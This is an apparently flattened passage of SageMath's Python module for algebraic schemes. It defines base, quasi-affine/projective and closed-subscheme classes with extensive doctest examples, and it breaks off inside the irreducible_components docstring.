from sage.categories.number_fields import NumberFields
from sage.rings.all import ZZ, QQbar
from sage.rings.ideal import is_Ideal
from sage.rings.rational_field import is_RationalField
from sage.rings.finite_rings.finite_field_constructor import is_FiniteField
from sage.rings.number_field.order import is_NumberFieldOrder
from sage.misc.latex import latex
from sage.misc.misc import is_iterator
from sage.structure.all import Sequence
from sage.structure.richcmp import richcmp, richcmp_method
from sage.calculus.functions import jacobian
from sage.arith.all import gcd, lcm
import sage.schemes.affine
from . import ambient_space
from . import scheme
#*******************************************************************
def is_AlgebraicScheme(x):
"""
Test whether ``x`` is an algebraic scheme.
INPUT:
- ``x`` -- anything.
OUTPUT:
Boolean. Whether ``x`` is an algebraic scheme, that is, a
subscheme of an ambient space over a ring defined by polynomial
equations.
EXAMPLES::
sage: A2 = AffineSpace(2, QQ, 'x, y')
sage: A2.coordinate_ring().inject_variables()
Defining x, y
sage: V = A2.subscheme([x^2+y^2]); V
Closed subscheme of Affine Space of dimension 2 over Rational Field defined by:
x^2 + y^2
sage: from sage.schemes.generic.algebraic_scheme import is_AlgebraicScheme
sage: is_AlgebraicScheme(V)
True
Affine space is itself not an algebraic scheme, though the closed
subscheme defined by no equations is::
sage: from sage.schemes.generic.algebraic_scheme import is_AlgebraicScheme
sage: is_AlgebraicScheme(AffineSpace(10, QQ))
False
sage: V = AffineSpace(10, QQ).subscheme([]); V
Closed subscheme of Affine Space of dimension 10 over Rational Field defined by:
(no polynomials)
sage: is_AlgebraicScheme(V)
True
We create a more complicated closed subscheme::
sage: A,x = AffineSpace(10, QQ).objgens()
sage: X = A.subscheme([sum(x)]); X
Closed subscheme of Affine Space of dimension 10 over Rational Field defined by:
x0 + x1 + x2 + x3 + x4 + x5 + x6 + x7 + x8 + x9
sage: is_AlgebraicScheme(X)
True
::
sage: is_AlgebraicScheme(QQ)
False
sage: S = Spec(QQ)
sage: is_AlgebraicScheme(S)
False
"""
return isinstance(x, AlgebraicScheme)
#*******************************************************************
class AlgebraicScheme(scheme.Scheme):
"""
An algebraic scheme presented as a subscheme in an ambient space.
This is the base class for all algebraic schemes, that is, schemes
defined by equations in affine, projective, or toric ambient
spaces.
"""
def __init__(self, A):
"""
TESTS::
sage: from sage.schemes.generic.algebraic_scheme import AlgebraicScheme
sage: P = ProjectiveSpace(3, ZZ)
sage: P.category()
Category of schemes over Integer Ring
sage: S = AlgebraicScheme(P); S
Subscheme of Projective Space of dimension 3 over Integer Ring
sage: S.category()
Category of schemes over Integer Ring
"""
if not ambient_space.is_AmbientSpace(A):
raise TypeError("A (=%s) must be an ambient space")
self.__A = A
self.__divisor_group = {}
scheme.Scheme.__init__(self, A.base_scheme())
def _latex_(self):
"""
Return a LaTeX representation of this algebraic scheme.
TESTS::
sage: from sage.schemes.generic.algebraic_scheme import AlgebraicScheme
sage: P = ProjectiveSpace(3, ZZ)
sage: S = AlgebraicScheme(P); S
Subscheme of Projective Space of dimension 3 over Integer Ring
sage: S._latex_()
'\text{Subscheme of } {\\mathbf P}_{\\Bold{Z}}^3'
"""
return "\text{Subscheme of } %s" % latex(self.__A)
def is_projective(self):
"""
Return True if self is presented as a subscheme of an ambient
projective space.
OUTPUT:
Boolean.
EXAMPLES::
sage: PP.<x,y,z,w> = ProjectiveSpace(3,QQ)
sage: f = x^3 + y^3 + z^3 + w^3
sage: R = f.parent()
sage: I = [f] + [f.derivative(zz) for zz in PP.gens()]
sage: V = PP.subscheme(I)
sage: V.is_projective()
True
sage: AA.<x,y,z,w> = AffineSpace(4,QQ)
sage: V = AA.subscheme(I)
sage: V.is_projective()
False
Note that toric varieties are implemented differently than
projective spaces. This is why this method returns ``False``
for toric varieties::
sage: PP.<x,y,z,w> = toric_varieties.P(3)
sage: V = PP.subscheme(x^3 + y^3 + z^3 + w^3)
sage: V.is_projective()
False
"""
return self.ambient_space().is_projective()
def coordinate_ring(self):
"""
Return the coordinate ring of this algebraic scheme. The
result is cached.
OUTPUT:
The coordinate ring. Usually a polynomial ring, or a quotient
thereof.
EXAMPLES::
sage: P.<x, y, z> = ProjectiveSpace(2, ZZ)
sage: S = P.subscheme([x-y, x-z])
sage: S.coordinate_ring()
Quotient of Multivariate Polynomial Ring in x, y, z over Integer Ring by the ideal (x - y, x - z)
"""
try:
return self._coordinate_ring
except AttributeError:
R = self.__A.coordinate_ring()
I = self.defining_ideal()
Q = R.quotient(I)
self._coordinate_ring = Q
return Q
def ambient_space(self):
"""
Return the ambient space of this algebraic scheme.
EXAMPLES::
sage: A.<x, y> = AffineSpace(2, GF(5))
sage: S = A.subscheme([])
sage: S.ambient_space()
Affine Space of dimension 2 over Finite Field of size 5
sage: P.<x, y, z> = ProjectiveSpace(2, ZZ)
sage: S = P.subscheme([x-y, x-z])
sage: S.ambient_space() is P
True
"""
return self.__A
def embedding_morphism(self):
r"""
Return the default embedding morphism of ``self``.
If the scheme `Y` was constructed as a neighbourhood of a
point `p \in X`, then :meth:`embedding_morphism` returns a
local isomorphism `f:Y\to X` around the preimage point
`f^{-1}(p)`. The latter is returned by
:meth:`embedding_center`.
If the algebraic scheme `Y` was not constructed as a
neighbourhood of a point, then the embedding in its
:meth:`ambient_space` is returned.
OUTPUT:
A scheme morphism whose
:meth:`~morphism.SchemeMorphism.domain` is ``self``.
* By default, it is the tautological embedding into its own
ambient space :meth:`ambient_space`.
* If the algebraic scheme (which itself is a subscheme of an
auxiliary :meth:`ambient_space`) was constructed as a patch
or neighborhood of a point then the embedding is the
embedding into the original scheme.
* A ``NotImplementedError`` is raised if the construction of
the embedding morphism is not implemented yet.
EXAMPLES::
sage: A2.<x,y> = AffineSpace(QQ,2)
sage: C = A2.subscheme(x^2+y^2-1)
sage: C.embedding_morphism()
Scheme morphism:
From: Closed subscheme of Affine Space of dimension 2 over Rational Field defined by:
x^2 + y^2 - 1
To: Affine Space of dimension 2 over Rational Field
Defn: Defined on coordinates by sending (x, y) to
(x, y)
sage: P1xP1.<x,y,u,v> = toric_varieties.P1xP1()
sage: P1 = P1xP1.subscheme(x-y)
sage: P1.embedding_morphism()
Scheme morphism:
From: Closed subscheme of 2-d CPR-Fano toric variety covered
by 4 affine patches defined by:
x - y
To: 2-d CPR-Fano toric variety covered by 4 affine patches
Defn: Defined on coordinates by sending [x : y : u : v] to
[y : y : u : v]
So far, the embedding was just in the own ambient space. Now a
bit more interesting examples::
sage: P2.<x,y,z> = ProjectiveSpace(QQ,2)
sage: X = P2.subscheme((x^2-y^2)*z)
sage: p = (1,1,0)
sage: nbhd = X.neighborhood(p)
sage: nbhd
Closed subscheme of Affine Space of dimension 2 over Rational Field defined by:
-y^2*z - 2*y*z
Note that `p=(1,1,0)` is a singular point of `X`. So the
neighborhood of `p` is not just affine space. The
:meth:`neighborhood` method returns a presentation of
the neighborhood as a subscheme of an auxiliary 2-dimensional
affine space::
sage: nbhd.ambient_space()
Affine Space of dimension 2 over Rational Field
But its :meth:`embedding_morphism` is not into this auxiliary
affine space, but the original subscheme `X`::
sage: nbhd.embedding_morphism()
Scheme morphism:
From: Closed subscheme of Affine Space of dimension 2 over Rational Field defined by:
-y^2*z - 2*y*z
To: Closed subscheme of Projective Space of dimension 2 over Rational Field defined by:
x^2*z - y^2*z
Defn: Defined on coordinates by sending (y, z) to
(1 : y + 1 : z)
A couple more examples::
sage: patch1 = P1xP1.affine_patch(1)
sage: patch1
2-d affine toric variety
sage: patch1.embedding_morphism()
Scheme morphism:
From: 2-d affine toric variety
To: 2-d CPR-Fano toric variety covered by 4 affine patches
Defn: Defined on coordinates by sending [y : u] to
[1 : y : u : 1]
sage: subpatch = P1.affine_patch(1)
sage: subpatch
Closed subscheme of 2-d affine toric variety defined by:
-y + 1
sage: subpatch.embedding_morphism()
Scheme morphism:
From: Closed subscheme of 2-d affine toric variety defined by:
-y + 1
To: Closed subscheme of 2-d CPR-Fano toric variety covered
by 4 affine patches defined by:
x - y
Defn: Defined on coordinates by sending [y : u] to
[1 : y : u : 1]
"""
if '_embedding_morphism' in self.__dict__:
hom = self._embedding_morphism
if isinstance(hom, tuple):
raise hom[0]
return hom
ambient = self.ambient_space()
return self.hom(self.coordinate_ring().gens(), ambient)
def embedding_center(self):
r"""
Return the distinguished point, if there is any.
If the scheme `Y` was constructed as a neighbourhood of a
point `p \in X`, then :meth:`embedding_morphism` returns a
local isomorphism `f:Y\to X` around the preimage point
`f^{-1}(p)`. The latter is returned by
:meth:`embedding_center`.
OUTPUT:
A point of ``self``. Raises ``AttributeError`` if there is no
distinguished point, depending on how ``self`` was
constructed.
EXAMPLES::
sage: P3.<w,x,y,z> = ProjectiveSpace(QQ,3)
sage: X = P3.subscheme( (w^2-x^2)*(y^2-z^2) )
sage: p = [1,-1,3,4]
sage: nbhd = X.neighborhood(p); nbhd
Closed subscheme of Affine Space of dimension 3 over Rational Field defined by:
w^2*y^2 - x^2*y^2 + 6*w^2*y - 6*x^2*y + 2*w*y^2 +
2*x*y^2 - 7*w^2 + 7*x^2 + 12*w*y + 12*x*y - 14*w - 14*x
sage: nbhd.embedding_center()
(0, 0, 0)
sage: nbhd.embedding_morphism()(nbhd.embedding_center())
(1/4 : -1/4 : 3/4 : 1)
sage: nbhd.embedding_morphism()
Scheme morphism:
From: Closed subscheme of Affine Space of dimension 3 over Rational Field defined by:
w^2*y^2 - x^2*y^2 + 6*w^2*y - 6*x^2*y + 2*w*y^2 +
2*x*y^2 - 7*w^2 + 7*x^2 + 12*w*y + 12*x*y - 14*w - 14*x
To: Closed subscheme of Projective Space of dimension 3 over Rational Field defined by:
w^2*y^2 - x^2*y^2 - w^2*z^2 + x^2*z^2
Defn: Defined on coordinates by sending (w, x, y) to
(w + 1 : x - 1 : y + 3 : 4)
"""
if '_embedding_center' in self.__dict__:
return self._embedding_center
raise AttributeError('This algebraic scheme does not have a designated point.')
def ngens(self):
"""
Return the number of generators of the ambient space of this
algebraic scheme.
EXAMPLES::
sage: A.<x, y> = AffineSpace(2, GF(5))
sage: S = A.subscheme([])
sage: S.ngens()
2
sage: P.<x, y, z> = ProjectiveSpace(2, ZZ)
sage: S = P.subscheme([x-y, x-z])
sage: P.ngens()
3
"""
return self.__A.ngens()
def _repr_(self):
"""
Return a string representation of this algebraic scheme.
TESTS::
sage: from sage.schemes.generic.algebraic_scheme import AlgebraicScheme
sage: P = ProjectiveSpace(3, ZZ)
sage: S = AlgebraicScheme(P); S
Subscheme of Projective Space of dimension 3 over Integer Ring
sage: S._repr_()
'Subscheme of Projective Space of dimension 3 over Integer Ring'
"""
return "Subscheme of %s"%self.__A
def _homset(self, *args, **kwds):
"""
Construct the Hom-set
INPUT:
Same as :class:`sage.schemes.generic.homset.SchemeHomset_generic`.
OUTPUT:
The Hom-set of the ambient space.
EXAMPLES::
sage: P1.<x,y> = toric_varieties.P1()
sage: type(P1.Hom(P1))
<class 'sage.schemes.toric.homset.SchemeHomset_toric_variety_with_category'>
sage: X = P1.subscheme(x-y)
sage: type(X.Hom(X))
<class 'sage.schemes.toric.homset.SchemeHomset_toric_variety_with_category'>
::
sage: P1xP1 = toric_varieties.P1xP1()
sage: P1 = toric_varieties.P1()
sage: P1xP1._homset(P1xP1,P1)
Set of morphisms
From: 2-d CPR-Fano toric variety covered by 4 affine patches
To: 1-d CPR-Fano toric variety covered by 2 affine patches
"""
return self.__A._homset(*args, **kwds)
def _point_homset(self, *args, **kwds):
"""
Construct a point Hom-set. For internal use only.
TESTS::
sage: P2.<x,y,z> = ProjectiveSpace(2, ZZ)
sage: P2._point_homset(Spec(ZZ), P2)
Set of rational points of Projective Space of dimension 2 over Integer Ring
"""
return self.__A._point_homset(*args, **kwds)
def _point(self, *args, **kwds):
r"""
Construct a point of ``self``. For internal use only.
TESTS::
sage: P2.<x,y,z> = ProjectiveSpace(2, QQ)
sage: point_homset = P2._point_homset(Spec(QQ), P2)
sage: P2._point(point_homset, [1,2,1])
(1 : 2 : 1)
"""
return self.__A._point(*args, **kwds)
#*******************************************************************
class AlgebraicScheme_quasi(AlgebraicScheme):
"""
The quasi-affine or quasi-projective scheme `X - Y`, where `X` and `Y`
are both closed subschemes of a common ambient affine or projective
space.
.. WARNING::
You should not create objects of this class directly. The
preferred method to construct such subschemes is to use
:meth:`complement` method of algebraic schemes.
OUTPUT:
An instance of :class:`AlgebraicScheme_quasi`.
EXAMPLES::
sage: P.<x, y, z> = ProjectiveSpace(2, ZZ)
sage: S = P.subscheme([])
sage: T = P.subscheme([x-y])
sage: T.complement(S)
Quasi-projective subscheme X - Y of Projective Space of dimension 2 over
Integer Ring, where X is defined by:
(no polynomials)
and Y is defined by:
x - y
"""
def __init__(self, X, Y):
"""
The constructor.
INPUT:
- ``X``, ``Y`` -- two subschemes of the same ambient space.
TESTS::
sage: P.<x, y, z> = ProjectiveSpace(2, ZZ)
sage: S = P.subscheme([])
sage: T = P.subscheme([x-y])
sage: from sage.schemes.generic.algebraic_scheme import AlgebraicScheme_quasi
sage: AlgebraicScheme_quasi(S, T)
Quasi-projective subscheme X - Y of Projective Space of dimension 2 over Integer Ring, where X is defined by:
(no polynomials)
and Y is defined by:
x - y
"""
self.__X = X
self.__Y = Y
if not isinstance(X, AlgebraicScheme_subscheme):
raise TypeError("X must be a closed subscheme of an ambient space.")
if not isinstance(Y, AlgebraicScheme_subscheme):
raise TypeError("Y must be a closed subscheme of an ambient space.")
if X.ambient_space() != Y.ambient_space():
raise ValueError("X and Y must be embedded in the same ambient space.")
# _latex_ and _repr_ assume all of the above conditions and should be
# probably changed if they are relaxed!
A = X.ambient_space()
self._base_ring = A.base_ring()
AlgebraicScheme.__init__(self, A)
def _latex_(self):
"""
Return a LaTeX representation of this algebraic scheme.
EXAMPLES::
sage: from sage.schemes.generic.algebraic_scheme import AlgebraicScheme_quasi
sage: P.<x, y, z> = ProjectiveSpace(2, ZZ)
sage: S = P.subscheme([])
sage: T = P.subscheme([x-y])
sage: U = AlgebraicScheme_quasi(S, T); U
Quasi-projective subscheme X - Y of Projective Space of dimension 2
over Integer Ring, where X is defined by:
(no polynomials)
and Y is defined by:
x - y
sage: U._latex_()
'\\text{Quasi-projective subscheme }
(X\\setminus Y)\\subset {\\mathbf P}_{\\Bold{Z}}^2,\\text{ where }
X \\text{ is defined by }\\text{no polynomials},\\text{ and }
Y \\text{ is defined by } x - y.'
"""
if sage.schemes.affine.affine_space.is_AffineSpace(self.ambient_space()):
t = "affine"
else:
t = "projective"
X = ', '.join(latex(f) for f in self.__X.defining_polynomials())
if not X:
X = r"\text{no polynomials}"
Y = ', '.join(latex(f) for f in self.__Y.defining_polynomials())
if not Y:
Y = r"\text{no polynomials}"
return (r"\text{Quasi-%s subscheme } (X\setminus Y)\subset %s,"
r"\text{ where } X \text{ is defined by }%s,"
r"\text{ and } Y \text{ is defined by } %s."
% (t, latex(self.ambient_space()), X, Y))
def _repr_(self):
r"""
Return a string representation of this algebraic scheme.
EXAMPLES::
sage: from sage.schemes.generic.algebraic_scheme import AlgebraicScheme_quasi
sage: P.<x, y, z> = ProjectiveSpace(2, ZZ)
sage: S = P.subscheme([])
sage: T = P.subscheme([x-y])
sage: U = AlgebraicScheme_quasi(S, T); U
Quasi-projective subscheme X - Y of Projective Space of dimension 2 over Integer Ring, where X is defined by:
(no polynomials)
and Y is defined by:
x - y
sage: U._repr_()
'Quasi-projective subscheme X - Y of Projective Space of dimension 2 over Integer Ring, where X is defined by:\n (no polynomials)\nand Y is defined by:\n x - y'
"""
if sage.schemes.affine.affine_space.is_AffineSpace(self.ambient_space()):
t = "affine"
else:
t = "projective"
return ("Quasi-%s subscheme X - Y of %s, where X is defined by:\n%s\n"
"and Y is defined by:\n%s"
% (t, self.ambient_space(), str(self.__X).split("\n", 1)[1],
str(self.__Y).split("\n", 1)[1]))
def X(self):
"""
Return the scheme `X` such that self is represented as `X - Y`.
EXAMPLES::
sage: P.<x, y, z> = ProjectiveSpace(2, ZZ)
sage: S = P.subscheme([])
sage: T = P.subscheme([x-y])
sage: U = T.complement(S)
sage: U.X() is S
True
"""
return self.__X
def Y(self):
"""
Return the scheme `Y` such that self is represented as `X - Y`.
EXAMPLES::
sage: P.<x, y, z> = ProjectiveSpace(2, ZZ)
sage: S = P.subscheme([])
sage: T = P.subscheme([x-y])
sage: U = T.complement(S)
sage: U.Y() is T
True
"""
return self.__Y
def _check_satisfies_equations(self, v):
"""
Verify that the coordinates of v define a point on this scheme, or
raise a TypeError.
EXAMPLES::
sage: P.<x, y, z> = ProjectiveSpace(2, ZZ)
sage: S = P.subscheme([])
sage: T = P.subscheme([x-y])
sage: U = T.complement(S)
sage: U._check_satisfies_equations([1, 2, 0])
True
sage: U._check_satisfies_equations([1, 1, 0])
Traceback (most recent call last):
...
TypeError: Coordinates [1, 1, 0] do not define a point on
Quasi-projective subscheme X - Y of Projective Space of dimension 2
over Integer Ring, where X is defined by:
(no polynomials)
and Y is defined by:
x - y
sage: U._check_satisfies_equations([1, 4])
Traceback (most recent call last):
...
TypeError: number of arguments does not match number of variables in parent
sage: A.<x, y> = AffineSpace(2, GF(7))
sage: S = A.subscheme([x^2-y])
sage: T = A.subscheme([x-y])
sage: U = T.complement(S)
sage: U._check_satisfies_equations([2, 4])
True
sage: U.point([2,4])
(2, 4)
sage: U._check_satisfies_equations(_)
True
sage: U._check_satisfies_equations([1, 1])
Traceback (most recent call last):
...
TypeError: Coordinates [1, 1] do not define a point on Quasi-affine
subscheme X - Y of Affine Space of dimension 2 over Finite
Field of size 7, where X is defined by:
x^2 - y
and Y is defined by:
x - y
sage: U._check_satisfies_equations([1, 0])
Traceback (most recent call last):
...
TypeError: Coordinates [1, 0] do not define a point on Quasi-affine
subscheme X - Y of Affine Space of dimension 2 over Finite
Field of size 7, where X is defined by:
x^2 - y
and Y is defined by:
x - y
TESTS:
The bug reported at :trac:`12211` has been fixed::
sage: P.<x, y, z, w> = ProjectiveSpace(3, QQ)
sage: S = P.subscheme([x])
sage: T = P.subscheme([y, z])
sage: U = T.complement(S)
sage: U._check_satisfies_equations([0, 0, 1, 1])
True
"""
coords = list(v)
for f in self.__X.defining_polynomials():
if f(coords) != 0:
raise TypeError("Coordinates %s do not define a point on %s"%(v,self))
for f in self.__Y.defining_polynomials():
if f(coords) != 0:
return True
raise TypeError("Coordinates %s do not define a point on %s"%(v,self))
def rational_points(self, **kwds):
"""
Return the set of rational points on this algebraic scheme
over the field `F`.
INPUT:
kwds:
- ``bound`` - integer (optional, default=0). The bound for the coordinates for
subschemes with dimension at least 1.
- ``F`` - field (optional, default=base ring). The field to compute
the rational points over.
EXAMPLES::
sage: A.<x, y> = AffineSpace(2, GF(7))
sage: S = A.subscheme([x^2-y])
sage: T = A.subscheme([x-y])
sage: U = T.complement(S)
sage: U.rational_points()
[(2, 4), (3, 2), (4, 2), (5, 4), (6, 1)]
sage: U.rational_points(F=GF(7^2, 'b'))
[(2, 4), (3, 2), (4, 2), (5, 4), (6, 1), (b, b + 4), (b + 1, 3*b + 5), (b + 2, 5*b + 1),
(b + 3, 6), (b + 4, 2*b + 6), (b + 5, 4*b + 1), (b + 6, 6*b + 5), (2*b, 4*b + 2),
(2*b + 1, b + 3), (2*b + 2, 5*b + 6), (2*b + 3, 2*b + 4), (2*b + 4, 6*b + 4),
(2*b + 5, 3*b + 6), (2*b + 6, 3), (3*b, 2*b + 1), (3*b + 1, b + 2), (3*b + 2, 5),
(3*b + 3, 6*b + 3), (3*b + 4, 5*b + 3), (3*b + 5, 4*b + 5), (3*b + 6, 3*b + 2),
(4*b, 2*b + 1), (4*b + 1, 3*b + 2), (4*b + 2, 4*b + 5), (4*b + 3, 5*b + 3),
(4*b + 4, 6*b + 3), (4*b + 5, 5), (4*b + 6, b + 2), (5*b, 4*b + 2), (5*b + 1, 3),
(5*b + 2, 3*b + 6), (5*b + 3, 6*b + 4), (5*b + 4, 2*b + 4), (5*b + 5, 5*b + 6),
(5*b + 6, b + 3), (6*b, b + 4), (6*b + 1, 6*b + 5), (6*b + 2, 4*b + 1), (6*b + 3, 2*b + 6),
(6*b + 4, 6), (6*b + 5, 5*b + 1), (6*b + 6, 3*b + 5)]
"""
F = kwds.get('F', None)
bound = kwds.get('bound', 0)
if F is None:
F = self.base_ring()
if bound == 0:
if is_RationalField(F):
raise TypeError("A positive bound (= %s) must be specified."%bound)
if not is_FiniteField(F):
raise TypeError("Argument F (= %s) must be a finite field."%F)
pts = []
for P in self.ambient_space().rational_points(F):
try:
if self._check_satisfies_equations(list(P)):
pts.append(P)
except TypeError:
pass
pts.sort()
return pts
#*******************************************************************
@richcmp_method
class AlgebraicScheme_subscheme(AlgebraicScheme):
"""
An algebraic scheme presented as a closed subscheme is defined by
explicit polynomial equations. This is as opposed to a general
scheme, which could, e.g., be the Neron model of some object, and
for which we do not want to give explicit equations.
INPUT:
- ``A`` - ambient space (e.g. affine or projective `n`-space)
- ``polynomials`` - single polynomial, ideal or iterable of defining
polynomials; in any case polynomials must belong to the coordinate
ring of the ambient space and define valid polynomial functions (e.g.
they should be homogeneous in the case of a projective space)
OUTPUT:
- algebraic scheme
EXAMPLES::
sage: from sage.schemes.generic.algebraic_scheme import AlgebraicScheme_subscheme
sage: P.<x, y, z> = ProjectiveSpace(2, QQ)
sage: P.subscheme([x^2-y*z])
Closed subscheme of Projective Space of dimension 2 over Rational Field defined by:
x^2 - y*z
sage: AlgebraicScheme_subscheme(P, [x^2-y*z])
Closed subscheme of Projective Space of dimension 2 over Rational Field defined by:
x^2 - y*z
"""
def __init__(self, A, polynomials):
"""
See ``AlgebraicScheme_subscheme`` for documentation.
TESTS::
sage: from sage.schemes.generic.algebraic_scheme import AlgebraicScheme_subscheme
sage: P.<x, y, z> = ProjectiveSpace(2, QQ)
sage: P.subscheme([x^2-y*z])
Closed subscheme of Projective Space of dimension 2 over Rational Field defined by:
x^2 - y*z
sage: AlgebraicScheme_subscheme(P, [x^2-y*z])
Closed subscheme of Projective Space of dimension 2 over Rational Field defined by:
x^2 - y*z
"""
from sage.rings.polynomial.multi_polynomial_sequence import is_PolynomialSequence
AlgebraicScheme.__init__(self, A)
self._base_ring = A.base_ring()
R = A.coordinate_ring()
if is_Ideal(polynomials):
I = polynomials
polynomials = I.gens()
if I.ring() is R: # Otherwise we will recompute I later after
self.__I = I # converting generators to the correct ring
if isinstance(polynomials, tuple) or is_PolynomialSequence(polynomials) or is_iterator(polynomials):
polynomials = list(polynomials)
elif not isinstance(polynomials, list):
# Looks like we got a single polynomial
polynomials = [polynomials]
for n, f in enumerate(polynomials):
try:
polynomials[n] = R(f)
except TypeError:
raise TypeError("%s cannot be converted to a polynomial in "
"the coordinate ring of this %s!" % (f, A))
polynomials = tuple(polynomials)
self.__polys = A._validate(polynomials)
def _check_satisfies_equations(self, v):
"""
Verify that the coordinates of v define a point on this scheme, or
raise a TypeError.
EXAMPLES::
sage: P.<x, y, z> = ProjectiveSpace(2, QQ)
sage: S = P.subscheme([x^2-y*z])
sage: S._check_satisfies_equations([1, 1, 1])
True
sage: S._check_satisfies_equations([1, 0, 1])
Traceback (most recent call last):
...
TypeError: Coordinates [1, 0, 1] do not define a point on Closed subscheme
of Projective Space of dimension 2 over Rational Field defined by:
x^2 - y*z
sage: S._check_satisfies_equations([0, 0, 0])
Traceback (most recent call last):
...
TypeError: Coordinates [0, 0, 0] do not define a point on Closed subscheme
of Projective Space of dimension 2 over Rational Field defined by:
x^2 - y*z
"""
coords = list(v)
for f in self.defining_polynomials():
if f(coords) != 0: # it must be "!=0" instead of "if f(v)", e.g.,
# because of p-adic base rings.
raise TypeError("Coordinates %s do not define a point on %s"%(coords,self))
try:
return self.ambient_space()._check_satisfies_equations(coords)
except TypeError:
raise TypeError("Coordinates %s do not define a point on %s"%(coords,self))
def base_extend(self, R):
"""
Return the base change to the ring `R` of this scheme.
EXAMPLES::
sage: P.<x, y, z> = ProjectiveSpace(2, GF(11))
sage: S = P.subscheme([x^2-y*z])
sage: S.base_extend(GF(11^2, 'b'))
Closed subscheme of Projective Space of dimension 2 over Finite Field in b of size 11^2 defined by:
x^2 - y*z
sage: S.base_extend(ZZ)
Traceback (most recent call last):
...
ValueError: no natural map from the base ring (=Finite Field of size 11) to R (=Integer Ring)!
"""
A = self.ambient_space().base_extend(R)
return A.subscheme(self.__polys)
def __richcmp__(self, other, op):
"""
EXAMPLES::
sage: A.<x, y, z> = AffineSpace(3, QQ)
sage: X = A.subscheme([x*y, z])
sage: X == A.subscheme([z, x*y])
True
sage: X == A.subscheme([x*y, z^2])
False
sage: B.<u, v, t> = AffineSpace(3, QQ)
sage: X == B.subscheme([u*v, t])
False
"""
if not isinstance(other, AlgebraicScheme_subscheme):
return NotImplemented
A = self.ambient_space()
if other.ambient_space() != A:
return NotImplemented
return richcmp(self.defining_ideal(), other.defining_ideal(), op)
def _latex_(self):
"""
Return a LaTeX representation of this scheme.
EXAMPLES::
sage: P.<x, y, z> = ProjectiveSpace(2, GF(11))
sage: S = P.subscheme([x^2-y*z])
sage: S
Closed subscheme of Projective Space of dimension 2 over Finite Field of size 11 defined by:
x^2 - y*z
sage: S._latex_()
'\\text{Closed subscheme of } {\\mathbf P}_{\\Bold{F}_{11}}^2 \\text{ defined by } x^{2} - y z'
sage: S = P.subscheme([x^2-y*z, x^5])
sage: S
Closed subscheme of Projective Space of dimension 2 over Finite Field of size 11 defined by:
x^2 - y*z,
x^5
sage: S._latex_()
'\\text{Closed subscheme of } {\\mathbf P}_{\\Bold{F}_{11}}^2 \\text{ defined by } x^{2} - y z, x^{5}'
"""
polynomials = ', '.join(latex(f) for f in self.defining_polynomials())
if not polynomials:
polynomials = r"\text{no polynomials}"
return (r"\text{Closed subscheme of } %s \text{ defined by } %s"
% (latex(self.ambient_space()), polynomials))
def _repr_(self):
r"""
Return a string representation of this scheme.
EXAMPLES::
sage: P.<x, y, z> = ProjectiveSpace(2, GF(11))
sage: S = P.subscheme([x^2-y*z])
sage: S
Closed subscheme of Projective Space of dimension 2 over Finite Field of size 11 defined by:
x^2 - y*z
sage: S._repr_()
'Closed subscheme of Projective Space of dimension 2 over Finite Field of size 11 defined by:\n x^2 - y*z'
sage: S = P.subscheme([x^2-y*z, x^5])
sage: S
Closed subscheme of Projective Space of dimension 2 over Finite Field of size 11 defined by:
x^2 - y*z,
x^5
sage: S._repr_()
'Closed subscheme of Projective Space of dimension 2 over Finite Field of size 11 defined by:\n x^2 - y*z,\n x^5'
"""
polynomials = ',\n '.join(str(f) for f in self.defining_polynomials())
if not polynomials:
polynomials = '(no polynomials)'
return ("Closed subscheme of %s defined by:\n %s"
% (self.ambient_space(), polynomials))
def defining_polynomials(self):
"""
Return the polynomials that define this scheme as a subscheme
of its ambient space.
OUTPUT:
A tuple of polynomials in the coordinate ring of the ambient
space.
EXAMPLES::
sage: P.<x, y, z> = ProjectiveSpace(2, ZZ)
sage: S = P.subscheme([x^2-y*z, x^3+z^3])
sage: S.defining_polynomials()
(x^2 - y*z, x^3 + z^3)
"""
return self.__polys
def normalize_defining_polynomials(self):
r"""
Function to normalize the coefficients of defining polynomials
of given subscheme.
Normalization as in removing denominator from all the coefficients,
and then removing any common factor between the coefficients.
It takes LCM of denominators and then removes common factor among
coefficients, if any.
EXAMPLES::
sage: A.<x,y> = AffineSpace(2, QQ)
sage: S = A.subscheme([2*x^2 + 4*x*y, 1/8*x + 1/3*y])
sage: S.normalize_defining_polynomials()
sage: S.defining_polynomials()
(x^2 + 2*x*y, 3*x + 8*y)
"""
BR = self.base_ring()
if BR == QQbar or BR in NumberFields() or is_NumberFieldOrder(BR):
normalized_polys = []
initial_polys = list(self.__polys)
for P in initial_polys:
# stores value which need to be mutliplied to make all coefficient integers
mult = lcm([c.denominator() for c in P.coefficients()])
P = mult*P
# stores the common factor from all coefficients
div = gcd([_ for _ in P.coefficients()])
poly_ring = P.parent() # need to coerce, since division might change base ring
P = poly_ring((BR.one()/div)*P)
normalized_polys.append(P)
self.__polys = tuple(normalized_polys)
else:
raise NotImplementedError("currently normalization is implemented "
"only for QQbar, number fields and number field orders")
def defining_ideal(self):
"""
Return the ideal that defines this scheme as a subscheme
of its ambient space.
OUTPUT:
An ideal in the coordinate ring of the ambient space.
EXAMPLES::
sage: P.<x, y, z> = ProjectiveSpace(2, ZZ)
sage: S = P.subscheme([x^2-y*z, x^3+z^3])
sage: S.defining_ideal()
Ideal (x^2 - y*z, x^3 + z^3) of Multivariate Polynomial Ring in x, y, z over Integer Ring
"""
try:
return self.__I
except AttributeError:
R = self.ambient_space().coordinate_ring()
self.__I = R.ideal(self.defining_polynomials())
return self.__I
# Note: dimension must be implemented by the derived classes
def codimension(self):
r"""
Return the codimension of the algebraic subscheme.
OUTPUT:
Integer.
EXAMPLES::
sage: PP.<x,y,z,w,v> = ProjectiveSpace(4,QQ)
sage: V = PP.subscheme(x*y)
sage: V.codimension()
1
sage: V.dimension()
3
"""
return self.ambient_space().dimension() - self.dimension()
def irreducible_components(self):
r"""
Return the irreducible components of this algebraic scheme, as
subschemes of the same ambient space.
OUTPUT:
an immutable sequence of irreducible subschemes of the ambient
space of this scheme
The components are cached.
EXAMPLES:
We define what is clearly a union of four hypersurfaces in
`\P^4_{\QQ}` then find the irreducible components::
sage: PP.<x,y,z,w,v> = ProjectiveSpace(4,QQ)
sage: V = PP.subscheme( (x^2 - y^2 - z^2)*(w^5 - 2*v^2*z^3)* w * (v^3 - x^2*z) )
sage: V.irreducible_components()
[
Closed subscheme of Projective Space of dimension 4 over Rational Field defined by:
w,
Closed subscheme of Projective Space of dimension 4 over Rational Field defined by:
x^2 - y^2 - z^2,
Closed subscheme of Projective Space of dimension 4 over Rational Field defined by:
x^2*z - v^3,
Closed subscheme of Projective Space of dimension 4 over Rational Field defined by:
w^5 - 2*z^3*v^2
]
